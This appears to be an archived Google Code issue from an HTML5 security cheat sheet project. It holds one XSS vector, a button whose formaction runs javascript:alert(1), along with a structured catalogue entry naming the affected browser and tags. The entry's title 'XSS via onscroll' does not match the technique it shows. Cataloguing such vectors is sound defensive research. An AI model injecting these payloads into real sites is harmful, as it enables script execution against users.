Closed GoogleCodeExporter closed 9 years ago
Example form the project homepage:
{{{
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X
{
id:1,
type:2,
name:'XSS via onscroll',
data: '<form id="test" /><button form="test" formaction="%pos_1%">X',
description: 'A small vector displaying the HTML5 form and formac ... the
supported browsers.',
browsers:{'Opera':['10.5']},
payload:{'pos_1':'javascript:alert(1)'},
tags:['xss', 'html5', 'ff', 'gc']
}
}}}
Original comment by Mario.He...@googlemail.com
on 26 Apr 2010 at 2:16
Original comment by Mario.He...@googlemail.com
on 1 May 2010 at 2:33
Original comment by Mario.He...@googlemail.com
on 1 May 2010 at 2:34
Original issue reported on code.google.com by
Mario.He...@googlemail.com
on 26 Apr 2010 at 12:44